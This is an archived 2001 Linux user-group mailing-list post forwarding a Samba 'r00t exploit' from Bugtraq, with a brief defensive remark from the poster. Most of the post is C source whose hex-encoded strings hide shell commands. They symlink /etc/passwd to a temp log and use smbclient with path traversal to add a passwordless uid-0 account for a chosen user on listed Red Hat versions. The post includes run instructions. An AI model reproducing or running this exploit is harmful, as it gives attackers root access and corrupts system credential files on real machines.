Mailing List ArchiveSupport open source code!
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]samba server exploit
- To: <tlug@example.com>
- Subject: samba server exploit
- From: "roy lo" <roylo@example.com>
- Date: Thu, 25 Oct 2001 17:01:46 -0700
- Content-type: multipart/alternative;boundary="----=_NextPart_000_0029_01C15D76.BA89C640"
- Delivered-to: tlug@example.com
- List-help: <mailto:tlug-request@example.comsubject=help>
- List-post: <mailto:tlug@example.com>
- List-subscribe: <mailto:tlug-request@example.comsubject=subscribe>
- List-unsubscribe: <mailto:tlug-request@example.comsubject=unsubscribe>
- Old-return-path: <roylo@example.com>
- Reply-to: tlug@example.com
- Resent-from: tlug@example.com
- Resent-message-id: <wVQFyB.A.mZH.jeK27@example.com>
- Resent-sender: tlug-request@example.com
saw this on bugtraq today,I know some of you run samba servers, so hopfully this will help you to identity the problem in the event of an attack.
/*
* Samba Server r00t exploit
*
* Scope: Local (this exploit) and posible remote if conditions are given.
* Vuln:
* RedHat 5.1
* RedHat 5.2
* RedHat 6.0
* RedHat 6.1
* RedHat 6.2
* RedHat 7.0
* RedHat 7.1
* I don't know if other versions are vulnerable too.
*
* Run this exploit and then take a look at your passwd file.
* Run: ./samba-exp user
*
* Author: Gabriel Maggiotti
* Email: gmaggiot@example.com
* Webpage: http://qb0x.net
*/
#include <stdio.h>
#include <string.h>
int main(int argc,char *argv[])
{
char inject1[]=
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
"\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject2[]=
"\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
"\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
"\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject3a[100]=
"\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
"\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
"\x68\x6f\x73\x74\x2f\x22\xa\xa";
char inject3b[]=
"\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
"\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
"\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
"\x4e\xa";
if(argc!=2){
fprintf(stderr,"usage: %s <user>\n",*argv);
return 1;
}
strcat(inject3a,argv[1]);
strcat(inject3a,inject3b);
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);
return 0;
}
- Follow-Ups:
- update for samba server exploit -> Re: samba server exploit
- From: "roy lo" <roylo@example.com>
Home | Main Index | Thread Index
- Prev by Date: Re: cd using inodes?
- Next by Date: update for samba server exploit -> Re: samba server exploit
- Previous by thread: Re: milestone 0.9
- Next by thread: update for samba server exploit -> Re: samba server exploit
- Index(es):
Home Page Mailing List Linux and Japan TLUG Members Links